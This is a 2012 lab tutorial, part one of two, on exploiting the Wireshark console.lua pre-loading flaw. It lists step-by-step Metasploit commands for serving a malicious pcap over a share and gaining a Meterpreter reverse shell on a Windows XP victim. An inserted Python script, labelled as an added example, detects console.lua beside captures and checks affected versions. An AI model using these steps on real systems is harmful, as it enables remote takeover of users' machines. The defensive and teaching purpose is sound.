
Wireshark console.lua pre-loading vulnerability Exploitation and Prevention part-I 

Feb 08, 2012 12:51 PM

I am writing this article in two parts. In Part I, I will explain how to exploit the Wireshark console.lua pre-loading vulnerability on Windows with Metasploit Express. In Part II, I will show how to prevent the Wireshark console.lua pre-loading vulnerability with Symantec Critical System Protection (SCSP).

 
Wireshark console.lua pre-loading vulnerability
 
This module exploits a vulnerability in Wireshark 1.6 or less. When opening a pcap file, Wireshark checks whether there is a 'console.lua' file in the same directory, and parses and executes the script if it is found. Versions affected by this vulnerability: 1.6.0 to 1.6.1 and 1.4.0 to 1.4.8.
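
The behaviour described above can be checked for before a capture is opened. This added example, which is not from the original article or from the Wireshark project, scans a folder tree for a console.lua sitting next to capture files and tests a version string against the affected ranges listed above; the function names, the extension list and the demo tree are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Assumption: extensions treated as capture files; adjust for your environment.
CAPTURE_EXTS = {".pcap", ".pcapng", ".cap"}
# Affected ranges exactly as listed in the article.
AFFECTED = [((1, 4, 0), (1, 4, 8)), ((1, 6, 0), (1, 6, 1))]


def is_affected(version):
    """True if a Wireshark version string falls in a range the article lists."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", version.strip())
    if not m:
        raise ValueError("unrecognised version string: %r" % version)
    v = tuple(int(p) for p in m.groups())
    return any(lo <= v <= hi for lo, hi in AFFECTED)


def find_preload_candidates(root):
    """Map each directory under root that holds console.lua to its capture files."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        # Windows file names are case-insensitive, so compare in lower case.
        if "console.lua" not in {f.lower() for f in files}:
            continue
        caps = sorted(f for f in files
                      if os.path.splitext(f)[1].lower() in CAPTURE_EXTS)
        if caps:
            hits[dirpath] = caps
    return hits


def build_demo_tree():
    """Constructed sample tree: one clean folder, one with console.lua beside a capture."""
    root = tempfile.mkdtemp(prefix="pcap_scan_")
    for rel in ("clean/trace.pcap", "share/msf.pcap", "share/Console.LUA",
                "scripts/console.lua"):
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        open(path, "wb").close()
    return root


if __name__ == "__main__":
    demo = build_demo_tree()
    for folder, caps in find_preload_candidates(demo).items():
        print("console.lua next to captures in %s: %s" % (folder, ", ".join(caps)))
    print("1.6.1 affected:", is_affected("1.6.1"), "| 1.6.2 affected:", is_affected("1.6.2"))
```

Point `find_preload_candidates` at a download folder or a mounted share before opening captures from it with an affected Wireshark build.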
 
Exploitation Of Wireshark console.lua pre-loading vulnerability
 
1) Our victim is using Windows XP Professional SP3 and its IP address is 192.168.42.179.

2) I am using BackTrack 5 R1 as the attacker machine and its IP address is 192.168.42.75.

3) I am using the windows/misc/wireshark_lua Metasploit module for the Wireshark console.lua pre-loading vulnerability (use exploit/windows/misc/wireshark_lua).

4) To view the available options, run the show options command. I have to set the srvhost (set srvhost 192.168.42.75).

5) I am using the windows/meterpreter/reverse_tcp payload (set payload windows/meterpreter/reverse_tcp).

6) Now I have to enter LHOST (Local Host), i.e. 192.168.42.75 (the attacker machine's IP address).

7) Type exploit and hit Enter. A server is started on the attacker machine to listen for connections from other machines and to infect them.

8) Our victim tries to access the shared folder of the attacker machine.

9) It shows a malicious pcap file on the victim machine.

10) When our victim tries to open the msf.pcap file in Wireshark, our exploit will execute on his machine and give a shell to the attacker machine.

11) I successfully got the meterpreter shell of our victim machine.

12) Let's type the ipconfig command to verify whether we have entered the victim machine or not.
 
In the next part, I will show you how to prevent exploitation of the Wireshark console.lua pre-loading vulnerability on Windows with Symantec Critical System Protection (SCSP).
